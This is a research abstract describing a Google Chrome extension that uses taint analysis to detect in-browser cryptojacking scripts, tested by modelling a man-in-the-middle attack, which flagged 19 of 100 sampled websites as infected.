Cryptojacking (also called malicious cryptocurrency mining or cryptomining) is a new threat model in which CPU resources are covertly used to "mine" a cryptocurrency in the browser. The impact is a surge in CPU usage that slows system performance. In this research, an in-browser cryptojacking mitigation has been built as an extension in Google Chrome using the taint analysis method. The method used in this research is attack modeling with an abuse case, using a Man-In-The-Middle (MITM) attack to test the mitigation. The proposed model is designed so that users are notified if a cryptojacking attack occurs; the user is then able to check the characteristics of the scripts running in the website background. The results of this research show that taint analysis is a promising method for mitigating cryptojacking attacks. From 100 random sample websites, the taint analysis method detected 19 websites infected by cryptojacking.